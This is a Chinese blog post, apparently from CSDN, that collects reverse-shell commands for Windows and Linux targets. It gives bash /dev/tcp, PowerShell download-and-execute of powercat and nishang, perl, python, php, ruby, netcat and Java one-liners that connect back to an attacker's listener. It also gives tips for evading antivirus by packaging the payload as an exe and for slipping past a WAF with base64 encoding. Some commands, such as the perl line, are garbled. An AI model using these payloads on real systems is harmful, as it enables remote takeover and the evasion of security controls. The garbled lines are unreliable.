window反弹shell

已于 2022-02-17 21:44:10 修改
阅读量1.1k 收藏 1
点赞数 1
分类专栏: # 技巧 内网 文章标签: perl 服务器 网络
于 2022-02-16 16:02:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/122965718
版权

1.nc反弹shell

远程服务器 nc 监听命令

nc -vlnp 8080

受害者反弹 shell 命令,每种语言都有 sock 连接命令,可以根据不通过的环境,选择合适的命令。
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

2.powershell反弹cmd

powercat是netcat的powershell版本
下载地址 https://github.com/besimorhino/powercat

powercat是netcat的powershell版本
所以可以放在可被访问的远程服务器上。执行命令的时候,自动下载执行。
http://192.168.0.195/powercat.ps1

powershell IEX (New-Object

System.Net.Webclient).DownloadString(‘http://192.168.0.195/powercat.ps1’);

powercat -c 192.168.0.195 -p 8888 -e cmd

3.nishang反弹shell

Reverse TCP shell

在自己的服务上搭建下载

http://192.168.0.195/nishang/Shells/Invoke- PowerShellTcp.ps1

目标机执行:

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.195/nishang/Shells/Invoke- PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.0.195 -port 6666

Reverse UDP shell

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.195/nishang/Shells/Invoke- PowerShellUdp.ps1'); Invoke-PowerShellUdp -Reverse -IPAddress 192.168.0.195 -port 53

perl -e ‘use
Socket; i = " 10.0.0.1 " ; i="10.0.0.1"; i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(
S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");ex
ec("/bin/sh -i");};’

4..python反弹cmd shell

使用python编写反弹shell,如果目标支持python3可以脚本直接执行即可
如果遇到 杀软 可以使用 生成exe的版本 可以很好的逃逸杀软
目标上没有安装python 可以使用命令打包成exe在上传执行

打包:

pyinstaller -Fw pycat.py

攻击者监听

nc -lvp 6666

被控端 执行

/c C:\Windows\debug\WIA\pycat.exe --host 192.168.0.195 --port 6666

python -c ‘import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1
“,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([”/bin/sh”,"-i"]);’

5.php

php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec("/bin/sh -i <&3 >&3 2>&3");’

ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d
2>&%d",f,f,f)’

6.nc

nc -e /bin/sh 10.0.0.1 1234

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c",“exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line
2>&5 >&5; done”] as String[])
p.waitFor()s

7.如果有 waf ,base64 加密后

如果有 waf 进行连接,可以把语句进行 base64 加密后,因为加密后的字符串没有触发拦截规则,再利用
shell 命令再进行解码。

bash -i >& /dev/tcp/192.168.0.103/8080 0>&1
base64 编码后 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTAzLzgwODAgMD4mMQ==
受害者执行
echo “YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTMzLzgwODAgMD4mMQ==”|base64 -d|bash
远程服务器监听

明月清风~~
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Windows下反弹shell的方法
2ed
07-16 1万+
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat 首先攻击者开启监听 nc -lvp 6666 或者使用powercat监听 powercat -l -p 6666 接着在目标机上反弹cmd shell:...
渗透测试-window反弹shell
lza20001103的博客
05-11 4257
window反弹shell
反弹shell详细易懂讲解,看这一篇就够了
最新发布
LCW991207的博客
05-26 1335
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
windows反弹shell复现
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
zrx9988的博客
05-15 419
所谓的正向连接以及反向连接都是需要根据参照物来进行确认的,所举的例子均是以Linux外网服务器为参照;当存在命令注入漏洞时,就需要使用连接符,将上述命令进行拼接执行。反向连接就是我把我的IP与端口号交出去,等待别人来控制我;正向连接就是主动出击,去控制别的服务器;示例:(Windows控制Linux)Linux控制Windows。Windows控制Linux。外网去控制内网的主机。
利用window自带的程序进行反弹shell——cdb,regsvr
渗透测试
08-31 793
windows的system文件夹下有一个regsvr32.exe的程序,它就是windows自带的activex注册和反注册工具。(activex不注册是不能够被系统识别和使用的,一般安装程序都会自动地把它所使用的activex控件注册)。Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。......
window shell 命令
05-21
Window Shell命令,通常指的是在Windows操作系统中模拟Linux命令行环境的一种工具或技术,使得开发者和系统管理员可以在Windows上运行类似于Linux的命令,提高跨平台工作的效率。这些命令通常以批处理脚本(.cmd)的...
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like ...
Window下adb shell中文乱码问题解决方法
09-03
Windows操作系统中,使用ADB(Android Debug Bridge)工具与Android设备进行交互时,有时会遇到中文乱码的问题,尤其是在执行`adb shell`命令进入设备的shell环境后。这个问题主要是由于字符编码的不兼容性导致的...
window shell工具 finalshell 4.3.10
03-01
FinalShell SSH工具,服务器管理,远程桌面加速软件,支持Windows,macOS,Linux,版本4.3.10,更新日期2023.12.31 FinalShell是一体化的的服务器,网络管理软件,不仅是ssh客户端,还是功能强大的开发,运维工具,充分满足开发,...
windows shell编程
07-30
Windows Shell编程是Windows操作系统下的一种交互式环境编程技术,它允许用户通过命令行接口执行系统操作,编写脚本实现自动化任务。尽管随着图形用户界面(GUI)的发展,像JavaScript、Python和Java这样的高级编程...
反弹shell的方法总结(base64绕过等等)
weixin_50464560的博客
04-01 8589
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Win
利用msf在windows下反弹shell
Jiajiajiang_的博客
08-08 7095
靶机地址:10.0.3.146 攻击者地址:10.0.3.120 思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。 通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo) 首先利用kali生成一个shell, 命令:msfvenom -p windows/meterpreter...
shell编程学习】反弹shell
yuxuan89814的专栏
05-23 786
反弹shell实验及命令解析
linux-cmdline漏洞,Linux下反弹CmdLine Shell小技巧漏洞预警 -电脑资料
weixin_28961645的博客
05-16 112
昨晚(应该是今天凌晨)玩了半天朋友给的Linux的WebShell,本来想实践一下UDEV提权呢,最后发现服务器貌似已经打过补丁了,不过还是有其他的收获的,所以我就YY下Linux反弹shell的问题。Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是我们的EXP必须在可交互环境运行,否则如果直接在WebShell执行,即使能提权成功,我们也没法利用...
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1325
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
windows 反弹shell_kali的payload的使用攻击之反弹型payload的使用
weixin_39804603的博客
12-03 1060
转自本人博客:https://blog.csdn.net/qq_44276741/article/details/105531525一、msfvenom 命令简介msfvenom是payload产生器,也是shellcode代码生成器Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。Shellcode,简单翻译“shell代码”,是Payload的一种,由...
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
window shell
03-16
Windows ShellWindows操作系统的用户界面,它提供了桌面、任务栏、开始菜单、文件资源管理器等常见的图形化界面,同时也支持命令行操作。Windows Shell还可以通过自定义主题、壁纸、图标等来个性化用户界面。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值